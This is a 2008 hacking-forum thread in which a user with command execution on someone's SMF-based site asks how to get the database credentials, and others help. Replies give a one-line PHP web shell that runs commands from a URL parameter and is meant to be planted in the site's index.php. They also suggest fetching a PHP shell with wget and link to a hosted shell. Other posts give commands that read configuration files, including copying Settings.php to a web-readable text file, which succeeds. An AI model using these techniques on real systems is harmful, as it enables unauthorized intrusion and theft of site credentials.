|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 66
Members: 0
Total: 66
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Php-Injection: Can't find config files |
|
Posted: Tue Dec 09, 2008 7:11 pm |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
I've got a shell with system()... The site has smf forum and normally there is a configuration file called Settings.php that has db user and pass, I found this by dll the source. So you would think this:
Code: | <? @system("ls /blah/blah/forum/"); ?>
It's there...so
<? @system("cat /blah/blah/forum/Settings.php"); ?>
|
but this file is showing up empty... So I don't understand where the db connection is made. I also tried this:
Code: |
<? @system("find / -name '*.conf*'"); ?>
and
<? @system("find / -name '*Settings*'"); ?>
|
No success of finding db connection
Any ideas? |
|
|
|
|
|
|
|
|
Posted: Tue Dec 09, 2008 7:33 pm |
|
|
capt |
Advanced user |
|
|
Joined: Nov 04, 2008 |
Posts: 232 |
|
|
|
|
|
|
|
prolly its chmod permissions or system() commands are disabled for that user.
Try a better code use this...
btw im guessing ur editing the code in the index.php file from the admin theme manager.
Code: |
<?php
if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;}
?> |
using this...
ex. http://somesite.com/index.php?lol=command (like wget,cat,ls -la,etc) |
|
|
|
|
Posted: Tue Dec 09, 2008 7:56 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
Look in the source of login.php. |
|
|
|
|
Posted: Tue Dec 09, 2008 8:47 pm |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
@capt
I'm not having a problem with system() function. My code is working fine but thanks for the reply.
@Pexli
Thanks, I will try login.php |
|
|
|
|
Posted: Tue Dec 09, 2008 10:55 pm |
|
|
capt |
Advanced user |
|
|
Joined: Nov 04, 2008 |
Posts: 232 |
|
|
|
|
|
|
|
have u tried wgeting a php shell then? Be easier to read and have much more control over what you wanna do. |
|
|
|
|
Posted: Tue Dec 09, 2008 11:30 pm |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
I'm not able to check to see if login.php will work because the creditials for the login isn't on this pc.
I did upload a b64 shell and it crashed the forum and was put back up later in the day. Not sure why this happened but I don't want it to happen again
http://thedefaced.org/shells/b64.txt |
|
|
|
|
Posted: Tue Dec 09, 2008 11:59 pm |
|
|
capt |
Advanced user |
|
|
Joined: Nov 04, 2008 |
Posts: 232 |
|
|
|
|
|
|
|
do you have msn? I could help you upload a working shell and you can get what you want.
add me if you would like sir_boxhead@hotmail.com |
|
|
|
|
Posted: Wed Dec 10, 2008 5:04 am |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
@Pexli
This looks to be useful in LogInOut.php
Code: |
$context['default_username'] = &$_REQUEST['u'];
$context['default_password'] = '';
|
I see it in the source of SMF but not in the one on the server
Where is this db connection made? |
|
|
|
|
Posted: Wed Dec 10, 2008 5:57 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
Try to read files like that
<? @readfile(/bla/bla/bla/file.php'); ?> |
|
|
|
|
Posted: Wed Dec 10, 2008 6:28 am |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
@Pexli
Thanks for reply. I'm getting the same output with readfile() as cat in system()
This is the code at the top of the page:
Code: |
'\'' . $user_settings['passwordSalt'] . '\'')); setLoginCookie($timeout - time(), $ID_MEMBER, sha1($user_settings['passwd']
|
So this part of the source seems to be missing or deleted?
Code: |
$context['page_title'] = $txt[34];
$context['default_username'] = &$_REQUEST['u'];
$context['default_password'] = '';
$context['never_expire'] = false;
|
|
|
|
|
|
Posted: Wed Dec 10, 2008 10:49 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
How about listing of all files and dir's? |
|
|
|
|
Posted: Thu Dec 11, 2008 1:49 am |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
I did this with, "ls -lR" and I see everything in blah/blah/blah/forum/. This is what you mean? |
|
|
|
|
Posted: Thu Dec 11, 2008 8:43 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
-AO- wrote: | I did this with, "ls -lR" and I see everything in blah/blah/blah/forum/. This is what you mean? |
cp /bla/bla/bla/forum/Settings.php /bla/bla/bla/forum/somefile.txt
...and read settings via browser http://forum.com/forum/somefile.txt |
|
|
|
|
Posted: Thu Dec 11, 2008 10:11 am |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
Code: | cp /bla/bla/bla/forum/Settings.php /bla/bla/bla/forum/somefile.txt
|
This worked, I can read the copied Settings.php file. Must have been some protection from reading it.
Thanks a lot pexli |
|
|
|
|
Posted: Thu Dec 11, 2008 11:19 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
-AO- wrote: | Code: | cp /bla/bla/bla/forum/Settings.php /bla/bla/bla/forum/somefile.txt
|
This worked, I can read the copied Settings.php file. Must have been some protection from reading it.
Thanks a lot pexli |
Good luck dude. |
|
|
|
|
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|